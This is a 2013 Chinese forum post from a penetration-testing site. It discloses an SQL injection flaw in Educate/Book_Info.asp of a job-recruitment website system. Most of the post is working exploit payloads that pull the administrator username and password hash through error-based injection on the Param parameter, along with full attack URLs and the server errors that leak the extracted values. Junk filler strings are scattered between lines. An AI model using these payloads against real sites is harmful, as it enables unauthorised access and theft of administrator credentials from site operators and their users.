中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:56
标题:
网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
5 y7 U: c) M2 D
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
0 V1 M9 j( s g
exp:如下
; @3 O5 X4 G5 g7 U
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
# q# L3 E) `, t1 ^) @5 g
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 w+ J/ t1 f, d
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" K4 ^* ?8 Z! ?( C- o* T* Q# R2 i: F
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
3 D, ]5 r2 c. c( W8 U) g9 M
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
$ P% J3 d( E6 ~ K4 X
/Educate/Book_Info.asp,行 8
3 g. }# W, B7 c5 k {
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" |4 E- t3 L! F7 i
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
- |% w" s8 o9 H& }/ q4 X
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ m3 Q8 J, z( q3 k( D4 X3 h/ ~
/Educate/Book_Info.asp,行 8
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2